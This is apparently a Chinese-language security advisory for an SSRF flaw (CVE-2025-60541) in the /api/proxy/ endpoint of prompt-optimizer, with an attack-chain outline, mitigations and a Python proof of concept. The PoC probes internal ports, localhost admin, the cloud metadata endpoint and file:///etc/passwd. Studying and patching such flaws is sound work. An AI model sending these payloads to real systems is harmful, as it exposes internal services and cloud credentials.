CVE-2025-60541: linshenkx prompt-optimizer /api/proxy/ SSRF漏洞

漏洞信息

漏洞编号

CVE-2025-60541

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

linshenkx prompt-optimizer

漏洞概述

CVE-2025-60541是linshenkx prompt-optimizer项目中存在的一个服务器端请求伪造（SSRF）漏洞。该漏洞存在于API组件的/api/proxy/路径中，影响版本从v1.3.0到v1.4.2。攻击者可以通过构造恶意的HTTP请求，利用该漏洞对内网资源进行扫描和访问。由于该漏洞不需要任何认证且无需用户交互，攻击门槛较低，具有较高的安全风险。CVSS 3.1评分7.3分（高危），攻击向量为网络层面，攻击复杂度低，对机密性、完整性和可用性均造成较低程度的影响。此类SSRF漏洞可能被用于探测内网服务、访问内部敏感接口、读取本地文件或对内网其他服务发起进一步攻击。

技术细节

该SSRF漏洞存在于linshenkx prompt-optimizer的/api/proxy/接口中。漏洞根源在于应用程序对用户提供的URL参数缺乏充分的验证和过滤。攻击者可以构造包含内网IP地址（如10.x.x.x、192.168.x.x、127.0.0.1）或内部域名（如localhost、metadata.google.internal）的请求URL，诱导服务器发起请求并返回内网资源的内容。攻击者利用此漏洞可以实现以下攻击：1）内网端口扫描和服务探测；2）访问云服务元数据端点获取敏感凭证；3）读取本地文件（如file:///etc/passwd）；4）对内网Web应用进行指纹识别；5）利用gopher协议对内网Redis、MySQL等服务发起攻击。由于该接口未设置访问控制且直接接受外部输入，攻击者可以在无需任何认证的情况下远程利用此漏洞。

攻击链分析

STEP 1

步骤1

攻击者识别目标站点使用linshenkx prompt-optimizer v1.3.0-v1.4.2版本

STEP 2

步骤2

攻击者发现/api/proxy/接口，该接口接受URL参数但未进行充分验证

STEP 3

步骤3

攻击者构造恶意请求，将内网IP或特殊域名作为URL参数（如127.0.0.1、10.x.x.x）

STEP 4

步骤4

服务器执行请求并返回内网资源内容，攻击者获取内网服务信息

STEP 5

步骤5

利用获取的信息进一步探测内网服务（如Redis、MySQL、AWS元数据等）

STEP 6

步骤6

结合其他漏洞或配置缺陷，实现进一步的攻击目标（如数据窃取、远程代码执行）

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-60541 SSRF PoC for linshenkx prompt-optimizer
# Target: /api/proxy/ endpoint

TARGET_URL = "http://target-server:8080/api/proxy/"

def test_ssrf(target):
    """Test for SSRF vulnerability in /api/proxy/ endpoint"""
    headers = {
        "Content-Type": "application/json"
    }
    
    # Test cases for SSRF
    test_payloads = [
        # Internal port scanning
        {"url": "http://127.0.0.1:22"},
        {"url": "http://127.0.0.1:3306"},
        {"url": "http://127.0.0.1:6379"},
        # Localhost access
        {"url": "http://localhost/admin"},
        # Internal network scanning
        {"url": "http://192.168.1.1:80"},
        {"url": "http://10.0.0.1:8080"},
        # Cloud metadata endpoint (AWS)
        {"url": "http://169.254.169.254/latest/meta-data/"},
        # File protocol
        {"url": "file:///etc/passwd"}
    ]
    
    for payload in test_payloads:
        try:
            response = requests.post(target, json=payload, headers=headers, timeout=10)
            print(f"[*] Testing: {payload['url']}")
            print(f"[*] Status: {response.status_code}")
            if response.status_code == 200 and len(response.text) > 0:
                print(f"[!] Potential SSRF - Response: {response.text[:200]}")
        except requests.exceptions.RequestException as e:
            print(f"[-] Error: {e}")

if __name__ == "__main__":
    print("[*] CVE-2025-60541 SSRF PoC")
    print(f"[*] Target: {TARGET_URL}")
    test_ssrf(TARGET_URL)

影响范围

linshenkx prompt-optimizer >= v1.3.0

linshenkx prompt-optimizer <= v1.4.2

防御指南

临时缓解措施

在官方修复版本发布前，可通过以下措施临时缓解：1）使用Web应用防火墙（WAF）规则限制/api/proxy/接口的访问，阻止包含内网IP或特殊域名的请求；2）通过nginx等反向代理对该接口实施访问控制或临时禁用；3）配置网络ACL规则限制服务器出站流量，仅允许访问必要的外部资源；4）启用应用日志监控，及时发现异常的代理请求行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-60541
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-60541
3 Details https://www.cvedetails.com/cve/CVE-2025-60541/
4 VulDB https://vuldb.com/cve/CVE-2025-60541
5 Link https://github.com/linshenkx/prompt-optimizer
6 Link https://github.com/linshenkx/prompt-optimizer/issues/179